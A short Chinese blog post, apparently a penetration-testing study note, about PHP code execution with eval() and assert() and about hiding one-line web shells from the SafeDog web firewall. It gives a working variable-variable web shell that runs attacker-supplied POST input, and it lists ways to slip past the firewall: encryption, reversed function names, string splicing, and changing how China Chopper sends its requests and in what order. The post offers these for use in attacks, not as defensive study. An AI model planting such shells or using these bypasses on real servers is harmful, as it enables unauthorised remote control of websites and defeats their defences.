渗透学习笔记之php代码执行漏洞

php 中提供两个函数eval(),assert(),这两个函数提供代码执行,以$_GET["x"],等等接受代码执行,这就是一句话

现在有安全狗,没办法只能做过狗处理了

现在已知的有加解密,函数倒转,拼接,变量覆盖

比如,变量覆盖:

<?php

$a = $_GET["x"];

$b = $_GET["y"];

$$a($_POST["qq"]);

>

这个方法已经不能过4.0的狗了,但是思路还可以

3.5及以前的安全狗在防护网马时,检查数据包中是否有菜刀的特征,如果有,立刻封杀,2 会检查提交的参数,会跟踪参数,进行行为监控

所以,3.5过狗方法1改变菜刀数据包的提交方式2改变菜刀的数据包的循序

用WSockExpert.exe抓取菜刀的Payload

重改提交方式,并将数据包解码,绕过安全狗

 

posted @ 2017-04-25 11:16  hesakill  阅读(187)  评论(0编辑  收藏  举报